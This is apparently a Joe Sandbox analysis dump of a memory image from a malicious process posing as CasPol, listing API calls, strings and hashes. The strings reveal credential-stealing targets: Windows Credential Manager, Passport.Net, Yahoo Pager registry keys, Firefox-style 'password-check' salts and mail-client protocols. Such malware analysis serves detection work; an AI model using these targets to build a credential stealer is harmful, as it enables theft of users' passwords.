                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 577244452-0
                                                                                                                                                                                    • Opcode ID: b68bf44ff0a216cc051a87f20d5bcca37ca8fef9720e645d8a392b89cae1757c
                                                                                                                                                                                    • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                                                                                                                                    • Opcode Fuzzy Hash: b68bf44ff0a216cc051a87f20d5bcca37ca8fef9720e645d8a392b89cae1757c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 00404518
                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 00404536
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _strcmpi$memcpystrlen
                                                                                                                                                                                    • String ID: imap$pop3$smtp
                                                                                                                                                                                    • API String ID: 2025310588-821077329
                                                                                                                                                                                    • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                                                                                                                    • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040C02D
                                                                                                                                                                                      • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                                                                                      • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                                                                                                      • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                                                                                                      • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                      • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                                                                                                                      • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                                                                                                                      • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                                                                                                                      • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                                                                                                      • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                                                                                                                      • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                                                                                                      • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                                                                                                    • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                    • API String ID: 2726666094-3614832568
                                                                                                                                                                                    • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                                                                                                                    • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                                                                                                                    • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00403A88
                                                                                                                                                                                    • memset.MSVCRT ref: 00403AA1
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AB8
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AD7
                                                                                                                                                                                    • strlen.MSVCRT ref: 00403AE9
                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AFA
                                                                                                                                                                                    Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: ByteCharMultiWidememset$FileWritestrlen
• String ID:
• API String ID: 1786725549-0
• Opcode ID: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
• Instruction ID: 75a67b34ad05bb499385cce9778aa698b1b4849105f4284936cacb9952f60aa3
• Opcode Fuzzy Hash: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
• Instruction Fuzzy Hash: 291121B680112CBEFB119BA4DCC5EEB73ADDF09355F0005A6B715D2092E6349F448B78
APIs
• GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
• GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
• GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
• OpenClipboard.USER32(?), ref: 0040C1B1
• GetLastError.KERNEL32 ref: 0040C1CA
• DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
• String ID:
• API String ID: 2014771361-0
• Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
• Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
• Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
• Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
APIs
• memcmp.MSVCRT ref: 00406151
  • Part of subcall function 0040607F: memcmp.MSVCRT ref: 0040609D
  • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
  • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
• memcmp.MSVCRT ref: 0040617C
• memcmp.MSVCRT ref: 004061A4
• memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: memcmp$memcpy
• String ID: global-salt$password-check
• API String ID: 231171946-3927197501
• Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
• Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
• Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
• Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
APIs
• ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
• ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
• ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
• ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
• ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
• ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
• Opcode ID: 729e63cf5715f59118fe9d1a7c2076f24b1191d02e23bde904ada99bcc76db32
• Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
• Opcode Fuzzy Hash: 729e63cf5715f59118fe9d1a7c2076f24b1191d02e23bde904ada99bcc76db32
• Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
APIs
• GetClientRect.USER32(?,?), ref: 004016A3
• GetSystemMetrics.USER32(00000015), ref: 004016B1
• GetSystemMetrics.USER32(00000014), ref: 004016BD
• BeginPaint.USER32(?,?), ref: 004016D7
• DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
• EndPaint.USER32(?,?), ref: 004016F3
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
• String ID:
• API String ID: 19018683-0
• Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
• Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
• Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
• Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
APIs
• memset.MSVCRT ref: 0040644F
• memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
• memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
  • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
  • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
  • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
  • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
  • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
• memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
• memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
• memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
• memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
  • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: memcpy$memset
• String ID:
• API String ID: 438689982-0
• Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
• Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
• Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
• Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
APIs
• memset.MSVCRT ref: 0044495F
• memset.MSVCRT ref: 00444978
• memset.MSVCRT ref: 0044498C
  • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
• strlen.MSVCRT ref: 004449A8
• memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449CD
• memcpy.MSVCRT(?,?,00000008,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449E3
  • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
  • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
• memcpy.MSVCRT(?,?,00000008,?,?,?,?,00000008,?,00000000,00000000), ref: 00444A23
  • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
  • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: memcpymemset$strlen
• String ID:
• API String ID: 2142929671-0
• Opcode ID: db1fe4889964b4b4561ff1fa413a374de4b2b8250443d72fdef4f343b664ad1c
• Instruction ID: aa4dc9b89352709bd4c521be83aedc2b1fb2a96970f66ede65b30d7c79a4835d
• Opcode Fuzzy Hash: db1fe4889964b4b4561ff1fa413a374de4b2b8250443d72fdef4f343b664ad1c
• Instruction Fuzzy Hash: 96513B7290015DAFDB10EF95CC81AEEB7B8FB44308F5445AAE509A7141EB34EA898F94
APIs
  • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
  • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll), ref: 004045E8
  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA,00000000,?,00000000), ref: 00404601
  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree,?,00000000), ref: 0040460D
  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA,?,00000000), ref: 00404619
  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA,?,00000000), ref: 00404625
                                                                                                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW,?,00000000), ref: 00404631
                                                                                                                                                                                      • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?,?,00000000), ref: 00404754
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F7BE
                                                                                                                                                                                    • _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                                                                                                                                                    • String ID: Passport.Net\*
                                                                                                                                                                                    • API String ID: 2329438634-3671122194
                                                                                                                                                                                    • Opcode ID: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                                                                                                                                                    • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                                                                                                                                                    • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                                                                                                                                    • memset.MSVCRT ref: 0040330B
                                                                                                                                                                                    • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                                                                                                                                    • strchr.MSVCRT ref: 0040335A
                                                                                                                                                                                      • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040339C
                                                                                                                                                                                      • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                                                                                                    • String ID: Personalities
                                                                                                                                                                                    • API String ID: 2103853322-4287407858
                                                                                                                                                                                    • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                                                                                                                                    • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                                                                                                                                                    • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00444573
                                                                                                                                                                                      • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                      • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseOpenQueryValuememset
                                                                                                                                                                                    • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                                                                                                    • API String ID: 1830152886-1703613266
                                                                                                                                                                                    • Opcode ID: 92186b2843cb95c86930638de19930e82a7f4a8b6566e79db89fa237099746d1
                                                                                                                                                                                    • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 92186b2843cb95c86930638de19930e82a7f4a8b6566e79db89fa237099746d1
                                                                                                                                                                                    • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLastMessagesprintf
                                                                                                                                                                                    • String ID: Error$Error %d: %s
                                                                                                                                                                                    • API String ID: 1670431679-1552265934
                                                                                                                                                                                    • Opcode ID: 01084951b307502bfaf43d4fbd3e54dffba0eab1b535d90173241ec551fbeaa7
                                                                                                                                                                                    • Instruction ID: a7eabb7ac59324d00fe13b249bdc4a7432a02f94c8438c44d3dfd779c6ab1540
                                                                                                                                                                                    • Opcode Fuzzy Hash: 01084951b307502bfaf43d4fbd3e54dffba0eab1b535d90173241ec551fbeaa7
                                                                                                                                                                                    • Instruction Fuzzy Hash: AEF0A77A8001086BDB10A7A4DC05FA676BCBB44344F1500B6B945F2151EA74DA058F98
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryA.KERNEL32(shlwapi.dll), ref: 00410FA2
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 00410FB0
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00410FC8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                    • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                                                    • API String ID: 145871493-1506664499
                                                                                                                                                                                    • Opcode ID: abe26a1acc7de01d0fbbea04bf45f8b750203d7cb8a5a0f94c9348c994a43a28
                                                                                                                                                                                    • Instruction ID: 0aecfb21e5a5e73b57ea68f7d566dfb4b74aadbd5913b1eaff8a54c705ff6fdb
                                                                                                                                                                                    • Opcode Fuzzy Hash: abe26a1acc7de01d0fbbea04bf45f8b750203d7cb8a5a0f94c9348c994a43a28
                                                                                                                                                                                    • Instruction Fuzzy Hash: F9D05B3E3026106BB6615B366C89EAFAAD5DFCA75271D0031F940E2150CB644C438D69
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0043DFC5
                                                                                                                                                                                    • memset.MSVCRT ref: 0043DFFE
                                                                                                                                                                                    • memcpy.MSVCRT(00000001,B2850F59,00000000,?,00000001,00000000), ref: 0043E27C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$memcpy
                                                                                                                                                                                    • String ID: $no query solution
                                                                                                                                                                                    • API String ID: 368790112-326442043
                                                                                                                                                                                    • Opcode ID: f59ee7c535991b4e4c1e2cd699b4550ba87100c19ab38750288448e459f31128
                                                                                                                                                                                    • Instruction ID: 13ed0bad29dc8f20330308844ce1f2220340576076c9bd20db88b336710dfa55
                                                                                                                                                                                    • Opcode Fuzzy Hash: f59ee7c535991b4e4c1e2cd699b4550ba87100c19ab38750288448e459f31128
                                                                                                                                                                                    • Instruction Fuzzy Hash: 46128A75D01619DFCB24CF9AC481AAEB7F1FF08314F14916EE895AB391D338A981CB58
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • unknown column "%s" in foreign key definition, xrefs: 00430C59
                                                                                                                                                                                    • foreign key on %s should reference only one column of table %T, xrefs: 00430A3D
                                                                                                                                                                                    • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430A65
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                    • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                    • API String ID: 3510742995-272990098
                                                                                                                                                                                    • Opcode ID: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                                                                                                                                                    • Instruction ID: 56a33166dce8f22c91c9f8fabbbf61fd3f81eb66f6c7064346fd2a8112c6bbd6
                                                                                                                                                                                    • Opcode Fuzzy Hash: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 32A14A71A00209DFCB14DF98D5909AEBBF1FF49704F24925EE805AB312D739EA41CB98
APIs
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: memset
• String ID: H
• API String ID: 2221118986-2852464175
APIs
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: memcpy
• String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
• API String ID: 3510742995-3170954634
APIs
  • Part of subcall function 0041384F: memcpy.MSVCRT(?,00417664,00000004,?,CwA,00417664,?,?,00417743,?,?,?,?), ref: 0041385C
• memcmp.MSVCRT ref: 0041DBAE
• memcmp.MSVCRT ref: 0041DBDB
• memcmp.MSVCRT ref: 0041DC47
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: memcmp$memcpy
• String ID: @ $SQLite format 3
• API String ID: 231171946-3708268960
APIs
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: memcpy$memset
• String ID: winWrite1$winWrite2
• API String ID: 438689982-3457389245
APIs
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: memcpymemset
• String ID: winRead
• API String ID: 1297977491-2759563040
APIs
• memset.MSVCRT ref: 0044955B
• memset.MSVCRT ref: 0044956B
• memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
